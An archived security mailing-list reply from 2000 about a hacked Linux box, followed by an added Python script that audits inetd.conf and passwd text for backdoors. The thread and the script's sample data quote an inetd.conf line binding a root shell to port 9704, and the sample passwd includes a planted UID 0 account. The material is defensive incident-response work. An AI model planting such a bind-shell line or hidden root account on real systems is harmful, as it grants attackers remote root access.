Security Incidents mailing list archives
Re: Possible widespread hole?
From: Jon Lewis <jlewis () LEWIS ORG>
Date: Sun, 27 Aug 2000 13:12:43 -0400
On Sat, 26 Aug 2000 c_patin () HOTMAIL COM wrote:
> Hi guys, I was snooping around my box yesterday, and noticed the following
> MAJOR hole listed at the bottom of /etc/inetd.conf:
>
> 9704 stream tcp nowait root /bin/sh sh -i
>
> I have since closed the hole, and placed my box behind a

You mean you closed _that_ hole.

> /etc/inetd.conf. Is this possibly some major hole in a package that we both
> installed, or did we just get hacked by the same person. Seems a little weird
> to just be coincidence. Any advice or ideas?

Most likely, you were hacked by either the same script kid or by another using the same tool kit. It's also likely you have additional holes such as backdoors in daemons listening for network connections, perhaps even additional users in /etc/passwd.

In fact last night, I was looking at some client firewall logs and noticed some linuxconf scans. I portscanned the originators and found a linux box in Korea that had been hacked by a dialup user in Indonesia. The box in Korea had a similar hole...root shell on port 8888 via a line added to inetd.conf. The hacker there had added a few accounts, and was actually telnetting in, using the new accounts, both from their dialup and from another box in Korea. That second Korean box had your hole...root shell on 9704.

----------------------------------------------------------------------
 Jon Lewis *jlewis () lewis org*|  I route
 System Administrator           |  therefore you are
 Atlantic Net                   |
_________ http://www.lewis.org/~jlewis/pgp for PGP public key_________
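
A check for the two things this message says to look for, as an added example that is not part of the original thread: it parses inetd.conf text and reports entries whose server program is a shell or whose service is a bare port number, and lists non-root UID 0 accounts in passwd text. The function names and all sample data except the quoted 9704 line are constructed for illustration.

```python
import os

SHELLS = {"sh", "ash", "bash", "dash", "csh", "tcsh", "ksh", "zsh"}

def audit_inetd(text):
    """Return (lineno, service, user, reason) for suspicious inetd.conf entries."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        fields = raw.split("#", 1)[0].split()
        if len(fields) < 6:
            continue  # blank line, comment, or too short to be an entry
        service, user, program, args = fields[0], fields[4], fields[5], fields[6:]
        # Check the program path and argv[0], so a shell behind tcpd is caught too.
        names = {os.path.basename(p) for p in [program] + args[:1]}
        if names & SHELLS:
            findings.append((lineno, service, user, "shell as server program"))
        elif service.isdigit():
            findings.append((lineno, service, user, "numeric port, no service name"))
    return findings

def audit_passwd(text):
    """Return non-root account names with UID 0 (does not catch unprivileged additions)."""
    return [f[0] for f in (l.split(":") for l in text.splitlines())
            if len(f) >= 7 and f[2] == "0" and f[0] != "root"]

# Constructed sample data; only the 9704 line is taken from the thread.
SAMPLE_INETD = """\
ftp     stream  tcp  nowait  root  /usr/sbin/tcpd  in.ftpd -l -a
telnet  stream  tcp  nowait  root  /usr/sbin/tcpd  in.telnetd
#shell  stream  tcp  nowait  root  /usr/sbin/tcpd  in.rshd
9704 stream tcp nowait root /bin/sh sh -i
"""
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
sysadm:x:0:0::/tmp:/bin/sh
"""

if __name__ == "__main__":
    for finding in audit_inetd(SAMPLE_INETD):
        print("inetd.conf line %d: service %s as %s: %s" % finding)
    for name in audit_passwd(SAMPLE_PASSWD):
        print("passwd: extra UID 0 account %r" % name)
```

A clean result from this check does not clear a host: as the message notes, backdoored daemons and ordinary added accounts would not show up here.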